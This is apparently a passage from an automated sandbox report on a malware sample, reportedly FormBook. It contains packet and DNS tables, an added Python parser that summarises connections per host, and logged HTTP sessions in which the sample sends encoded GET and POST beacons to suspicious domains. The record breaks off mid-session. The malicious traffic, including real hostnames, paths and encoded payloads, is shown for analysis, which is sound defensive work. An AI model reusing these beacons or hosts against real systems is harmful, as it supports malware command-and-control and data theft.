                                                                    Oct 30, 2024 04:59:09.346785069 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:09.360440969 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:09.365957975 CET8050020144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:10.005563974 CET8050020144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:10.038573027 CET8050020144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:10.038966894 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:10.867202044 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:11.885502100 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:11.890964985 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:11.893594027 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:11.905972958 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:11.911354065 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:11.911467075 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:12.557594061 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:12.588895082 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:12.589574099 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:13.415564060 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:14.432492971 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:14.438035965 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:14.441596031 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:14.457504988 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:14.462894917 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:15.088462114 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:15.119576931 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:15.119689941 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:15.121021032 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:15.126414061 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:20.371462107 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:20.376878023 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:20.376964092 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:20.388447046 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:20.393881083 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:21.101171017 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:21.101231098 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:21.101320028 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:21.160928965 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:21.160995960 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:21.898473978 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:23.229156971 CET5002480192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:23.234699011 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:23.234802008 CET5002480192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:23.244004965 CET5002480192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:23.249414921 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:23.993429899 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:23.993485928 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:23.999596119 CET5002480192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:24.054604053 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:24.059695005 CET5002480192.168.2.5136.143.186.12
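The packet tables in this report carry one packet per row (Timestamp, Source Port, Dest Port, Source IP, Dest IP), and in the extracted text the five columns run together, so a row such as `Oct 30, 2024 04:57:48.626992941 CET805000131.31.196.17192.168.2.5` has to be split before the traffic can be analysed. Taken on its own the digit run is ambiguous (80 | 50001 | 31.31.196.17 and 80 | 5000 | 131.31.196.17 are both well-formed). The Python below is an added example, not code from Joe Sandbox or from this report: it enumerates every cut of a row and keeps the one consistent with two assumptions the report does not state, namely that 192.168.2.5 is the analysis VM and that its client ports fall in the Windows default dynamic range 49152-65535 while the remote side's port does not. It then groups packets per remote host and reports the number of connections, the packet count and the gaps between successive connection starts. FormBook is known to contact a list of decoy hosts alongside its real C2, so a per-host view is the natural first cut through a table like this one. The sample rows are a subset copied verbatim from the TCP and DNS tables on this page.

```python
"""Parse the run-together packet rows of a Joe Sandbox report and summarise them per remote host.

Added example, not code from the report or from Joe Sandbox. Assumptions the report does not
state: the analysis VM is 192.168.2.5, its client ports lie in the Windows default dynamic
range 49152-65535, and the remote side's port lies outside that range.
"""
import re
from collections import OrderedDict, namedtuple
from datetime import datetime, timedelta

SANDBOX_IP = "192.168.2.5"           # assumption: address of the analysis VM
DYNAMIC_PORTS = range(49152, 65536)  # assumption: Windows default ephemeral port range
Packet = namedtuple("Packet", "ts src_port dst_port src_ip dst_ip")

# "Oct 30, 2024 04:57:48.626992941 CET" immediately followed by the glued ports and IPs
ROW_RE = re.compile(r"^(?P<date>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})"
                    r"\.(?P<frac>\d+) [A-Z]{3,5}(?P<rest>\d[\d.]*)$")


def _valid_ip(s):
    parts = s.split(".")
    return len(parts) == 4 and all(p.isdigit() and (p == "0" or p[0] != "0") and int(p) <= 255 for p in parts)


def _valid_port(s):
    return s.isdigit() and s[0] != "0" and 1 <= int(s) <= 65535


def _split_ports(digits, sandbox_first):
    """Yield (src_port, dst_port) cuts of a digit run in which the sandbox-side port is
    dynamic and the remote-side port is not; for real rows exactly one cut survives."""
    for i in range(1, len(digits)):
        a, b = digits[:i], digits[i:]
        if _valid_port(a) and _valid_port(b):
            local, remote = (a, b) if sandbox_first else (b, a)
            if int(local) in DYNAMIC_PORTS and int(remote) not in DYNAMIC_PORTS:
                yield int(a), int(b)


def parse_row(row, sandbox_ip=SANDBOX_IP):
    """Split one flattened row into a Packet; ValueError if zero or several cuts fit."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    # the report prints nanoseconds; datetime keeps microseconds, so truncate the fraction
    ts = datetime.strptime(m["date"], "%b %d, %Y %H:%M:%S") + timedelta(
        microseconds=int(m["frac"][:6].ljust(6, "0")))
    rest, found = m["rest"], []
    for hit in re.finditer(re.escape(sandbox_ip), rest):  # outbound: <ports><sandbox ip><remote ip>
        digits, ip = rest[:hit.start()], rest[hit.end():]
        if digits.isdigit() and _valid_ip(ip):
            found += [Packet(ts, a, b, sandbox_ip, ip) for a, b in _split_ports(digits, True)]
    if rest.endswith(sandbox_ip):  # inbound: <ports><remote ip><sandbox ip>; first octet glued to the ports
        head = rest[:-len(sandbox_ip)]
        for k in range(1, len(head)):
            digits, ip = head[:k], head[k:]
            if digits.isdigit() and _valid_ip(ip):
                found += [Packet(ts, a, b, ip, sandbox_ip) for a, b in _split_ports(digits, False)]
    if len(found) != 1:
        raise ValueError(f"{'ambiguous' if found else 'unparseable'} row: {row!r}")
    return found[0]


def parse_table(text, sandbox_ip=SANDBOX_IP):
    return [parse_row(line, sandbox_ip) for line in text.splitlines() if line.strip()]


def summarize(packets, sandbox_ip=SANDBOX_IP):
    """Per remote host, in order of first contact: flows (one per sandbox-side port), packet
    count, first/last timestamp and the gaps in seconds between successive flow starts."""
    hosts = OrderedDict()
    for p in sorted(packets, key=lambda q: q.ts):
        remote, local_port = (p.dst_ip, p.src_port) if p.src_ip == sandbox_ip else (p.src_ip, p.dst_port)
        h = hosts.setdefault(remote, {"flows": OrderedDict(), "packets": 0, "first": p.ts})
        h["packets"], h["last"] = h["packets"] + 1, p.ts
        h["flows"].setdefault(local_port, p.ts)  # timestamp of the flow's first packet
    summary = OrderedDict()
    for ip, h in hosts.items():
        starts = list(h["flows"].values())
        summary[ip] = {"flows": len(starts), "packets": h["packets"], "first": h["first"], "last": h["last"],
                       "gaps": [round((b - a).total_seconds(), 3) for a, b in zip(starts, starts[1:])]}
    return summary


# A subset of rows copied verbatim from the TCP and DNS packet tables of this report
SAMPLE_ROWS = """
Oct 30, 2024 04:57:49.538844109 CET5000180192.168.2.531.31.196.17
Oct 30, 2024 04:57:49.642199039 CET805000131.31.196.17192.168.2.5
Oct 30, 2024 04:57:51.151309967 CET5000280192.168.2.531.31.196.17
Oct 30, 2024 04:57:51.156887054 CET805000231.31.196.17192.168.2.5
Oct 30, 2024 04:58:05.307842016 CET5678853192.168.2.51.1.1.1
Oct 30, 2024 04:58:05.321018934 CET53567881.1.1.1192.168.2.5
Oct 30, 2024 04:58:05.323925018 CET5000380192.168.2.5188.114.97.3
Oct 30, 2024 04:58:05.329283953 CET8050003188.114.97.3192.168.2.5
Oct 30, 2024 04:58:07.871531963 CET5000480192.168.2.5188.114.97.3
Oct 30, 2024 04:58:10.417388916 CET5000580192.168.2.5188.114.97.3
Oct 30, 2024 04:58:12.963777065 CET5000680192.168.2.5188.114.97.3
"""

if __name__ == "__main__":
    for ip, s in summarize(parse_table(SAMPLE_ROWS)).items():
        print(f"{ip:>15}  flows={s['flows']}  packets={s['packets']}  "
              f"{s['first'].time()} -> {s['last'].time()}  gaps={s['gaps']}")
```

Run over the full TCP table above, the summary shows the sample walking through 31.31.196.17, 188.114.97.3, 206.119.82.147, 162.0.209.213, 3.33.130.190, 144.34.186.85 and 136.143.186.12 in turn, opening a few port-80 connections to each roughly 2.5 s apart before moving on. A host that receives a different number of connections, or breaks that cadence, is the one to examine first; the parser raises rather than guessing when a row admits more than one cut, so an unexpected sandbox address or port range shows up as an error instead of a silently wrong flow.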
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 04:56:09.082786083 CET | 58419 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:56:09.399851084 CET | 53 | 58419 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:56:25.182429075 CET | 50578 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:56:25.285238981 CET | 53 | 50578 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:56:39.096533060 CET | 54057 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:56:39.311584949 CET | 53 | 54057 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:56:54.182391882 CET | 63469 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:56:54.549531937 CET | 53 | 63469 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:09.308176041 CET | 63282 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:10.323276997 CET | 63282 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:11.320214987 CET | 63282 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:12.880155087 CET | 53 | 63282 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:12.880172968 CET | 53 | 63282 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:12.880181074 CET | 53 | 63282 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:14.899755955 CET | 64118 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:15.898577929 CET | 64118 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:16.913949966 CET | 64118 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:18.914454937 CET | 64118 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:20.402605057 CET | 53 | 64118 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:20.402631998 CET | 53 | 64118 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:20.402648926 CET | 53 | 64118 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:20.402659893 CET | 53 | 64118 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:21.415488958 CET | 50199 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:22.429847956 CET | 50199 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:23.430227995 CET | 50199 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:24.978745937 CET | 53 | 50199 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:24.978761911 CET | 53 | 50199 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:24.978771925 CET | 53 | 50199 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:29.995359898 CET | 56101 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:30.011158943 CET | 53 | 56101 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:43.403220892 CET | 61780 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:43.499269009 CET | 53 | 61780 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:57:57.245762110 CET | 60511 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:57:57.255835056 CET | 53 | 60511 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:58:05.307842016 CET | 56788 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:58:05.321018934 CET | 53 | 56788 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:58:18.620256901 CET | 49195 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:58:18.630414963 CET | 53 | 49195 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:58:39.807605982 CET | 54638 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 04:58:39.820667028 CET | 53 | 54638 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 04:58:53.280267954 CET | 53922 | 53 | 192.168.2.5 | 1.1.1.1
                                                                    Oct 30, 2024 04:58:53.292062998 CET53539221.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:59:06.777034044 CET5766753192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:59:06.790622950 CET53576671.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:59:20.137525082 CET4985353192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:59:20.368876934 CET53498531.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 04:56:09.082786083 CET | 192.168.2.5 | 1.1.1.1 | 0x6553 | Standard query (0) | www.ngmr.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:56:25.182429075 CET | 192.168.2.5 | 1.1.1.1 | 0x712d | Standard query (0) | www.drivedoge.website | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:56:39.096533060 CET | 192.168.2.5 | 1.1.1.1 | 0xa2b4 | Standard query (0) | www.fieldelse.net | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:56:54.182391882 CET | 192.168.2.5 | 1.1.1.1 | 0x4862 | Standard query (0) | www.patioprojex.africa | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:09.308176041 CET | 192.168.2.5 | 1.1.1.1 | 0xc4e1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:10.323276997 CET | 192.168.2.5 | 1.1.1.1 | 0xc4e1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:11.320214987 CET | 192.168.2.5 | 1.1.1.1 | 0xc4e1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:14.899755955 CET | 192.168.2.5 | 1.1.1.1 | 0xcfa1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:15.898577929 CET | 192.168.2.5 | 1.1.1.1 | 0xcfa1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:16.913949966 CET | 192.168.2.5 | 1.1.1.1 | 0xcfa1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:18.914454937 CET | 192.168.2.5 | 1.1.1.1 | 0xcfa1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:21.415488958 CET | 192.168.2.5 | 1.1.1.1 | 0xac1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:22.429847956 CET | 192.168.2.5 | 1.1.1.1 | 0xac1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:23.430227995 CET | 192.168.2.5 | 1.1.1.1 | 0xac1 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:29.995359898 CET | 192.168.2.5 | 1.1.1.1 | 0x4ca8 | Standard query (0) | www.huyven.xyz | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:43.403220892 CET | 192.168.2.5 | 1.1.1.1 | 0xf290 | Standard query (0) | www.dverkom.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:57.245762110 CET | 192.168.2.5 | 1.1.1.1 | 0x8ec2 | Standard query (0) | www.longfilsalphonse.net | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:05.307842016 CET | 192.168.2.5 | 1.1.1.1 | 0xfe1 | Standard query (0) | www.bayarcepat19.click | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:18.620256901 CET | 192.168.2.5 | 1.1.1.1 | 0x267c | Standard query (0) | www.wdeb18.top | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:39.807605982 CET | 192.168.2.5 | 1.1.1.1 | 0x2f91 | Standard query (0) | www.galaxyslot88rtp.lat | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:53.280267954 CET | 192.168.2.5 | 1.1.1.1 | 0x4801 | Standard query (0) | www.dto20.shop | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:59:06.777034044 CET | 192.168.2.5 | 1.1.1.1 | 0x5b6a | Standard query (0) | www.h5hph710am.site | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:59:20.137525082 CET | 192.168.2.5 | 1.1.1.1 | 0xfd16 | Standard query (0) | www.lanxuanz.tech | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 04:56:09.399851084 CET | 1.1.1.1 | 192.168.2.5 | 0x6553 | No error (0) | www.ngmr.xyz | | 54.67.87.110 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:56:25.285238981 CET | 1.1.1.1 | 192.168.2.5 | 0x712d | No error (0) | www.drivedoge.website | | 195.161.68.8 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:56:39.311584949 CET | 1.1.1.1 | 192.168.2.5 | 0xa2b4 | No error (0) | www.fieldelse.net | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:56:54.549531937 CET | 1.1.1.1 | 192.168.2.5 | 0x4862 | No error (0) | www.patioprojex.africa | patioprojex.africa | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 04:56:54.549531937 CET | 1.1.1.1 | 192.168.2.5 | 0x4862 | No error (0) | patioprojex.africa | | 197.189.237.186 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:12.880155087 CET | 1.1.1.1 | 192.168.2.5 | 0xc4e1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:12.880172968 CET | 1.1.1.1 | 192.168.2.5 | 0xc4e1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:12.880181074 CET | 1.1.1.1 | 192.168.2.5 | 0xc4e1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:20.402605057 CET | 1.1.1.1 | 192.168.2.5 | 0xcfa1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:20.402631998 CET | 1.1.1.1 | 192.168.2.5 | 0xcfa1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:20.402648926 CET | 1.1.1.1 | 192.168.2.5 | 0xcfa1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:20.402659893 CET | 1.1.1.1 | 192.168.2.5 | 0xcfa1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:24.978745937 CET | 1.1.1.1 | 192.168.2.5 | 0xac1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:24.978761911 CET | 1.1.1.1 | 192.168.2.5 | 0xac1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:24.978771925 CET | 1.1.1.1 | 192.168.2.5 | 0xac1 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:30.011158943 CET | 1.1.1.1 | 192.168.2.5 | 0x4ca8 | No error (0) | www.huyven.xyz | | 162.0.238.246 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:43.499269009 CET | 1.1.1.1 | 192.168.2.5 | 0xf290 | No error (0) | www.dverkom.store | | 31.31.196.17 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:57:57.255835056 CET | 1.1.1.1 | 192.168.2.5 | 0x8ec2 | Name error (3) | www.longfilsalphonse.net | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:05.321018934 CET | 1.1.1.1 | 192.168.2.5 | 0xfe1 | No error (0) | www.bayarcepat19.click | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:05.321018934 CET | 1.1.1.1 | 192.168.2.5 | 0xfe1 | No error (0) | www.bayarcepat19.click | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:18.630414963 CET | 1.1.1.1 | 192.168.2.5 | 0x267c | No error (0) | www.wdeb18.top | wdeb18.top | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 04:58:18.630414963 CET | 1.1.1.1 | 192.168.2.5 | 0x267c | No error (0) | wdeb18.top | | 206.119.82.147 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:39.820667028 CET | 1.1.1.1 | 192.168.2.5 | 0x2f91 | No error (0) | www.galaxyslot88rtp.lat | galaxyslot88rtp.lat | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 04:58:39.820667028 CET | 1.1.1.1 | 192.168.2.5 | 0x2f91 | No error (0) | galaxyslot88rtp.lat | | 162.0.209.213 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:53.292062998 CET | 1.1.1.1 | 192.168.2.5 | 0x4801 | No error (0) | www.dto20.shop | dto20.shop | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 04:58:53.292062998 CET | 1.1.1.1 | 192.168.2.5 | 0x4801 | No error (0) | dto20.shop | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:58:53.292062998 CET | 1.1.1.1 | 192.168.2.5 | 0x4801 | No error (0) | dto20.shop | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:59:06.790622950 CET | 1.1.1.1 | 192.168.2.5 | 0x5b6a | No error (0) | www.h5hph710am.site | h5hph710am.site | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 04:59:06.790622950 CET | 1.1.1.1 | 192.168.2.5 | 0x5b6a | No error (0) | h5hph710am.site | | 144.34.186.85 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 04:59:20.368876934 CET | 1.1.1.1 | 192.168.2.5 | 0xfd16 | No error (0) | www.lanxuanz.tech | zhs.zohosites.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 04:59:20.368876934 CET | 1.1.1.1 | 192.168.2.5 | 0xfd16 | No error (0) | zhs.zohosites.com | | 136.143.186.12 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49900 | 54.67.87.110 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:56:09.419415951 CET | 467 | OUT | GET /fu87/?vxPD=qh6vHM1wnebxXDDw2+FKNmF+EgGb6h3lhyJTJqyJk9tXxJTOz685U0RnFTuJgXE78BkDdexAIHcYDkJjTquRDOTOtPaRUKFiNfEDt1vQqQEhgT+IhmyUGPK3HCAi1oMdiQ==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.ngmr.xyz
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Oct 30, 2024 04:56:10.098536968 CET | 550 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Wed, 30 Oct 2024 04:19:38 GMT
                                                                    X-Varnish: 1439864526
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fu87/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49981 | 195.161.68.8 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:56:25.303983927 CET | 742 | OUT | POST /czka/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.drivedoge.website
                                                                    Origin: http://www.drivedoge.website
                                                                    Referer: http://www.drivedoge.website/czka/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Ascii: vxPD=TeWf6fpTkEffiJg57X5mueQCoXEnXax7o3pibdRn3AdhR+XbAdAjy7uKo9+oqk73/8cvB4xLlfe+hoNErmrSp5faDd4/EMZIfjRiFNRgxDuxsD3sHP6h4uDCUAKmh7nTX/XhigoORgRYfyeIUTTbcm/K2NBA/KlDRgxf6dmt470hB8OBxzf6mr+555LmaNCpKPrxwLs=
Oct 30, 2024 04:56:26.233187914 CET | 778 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:56:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 634
                                                                    Connection: close
                                                                    Server: Apache
                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49982 | 195.161.68.8 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 04:56:27.854671955 CET | 762 | OUT | POST /czka/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
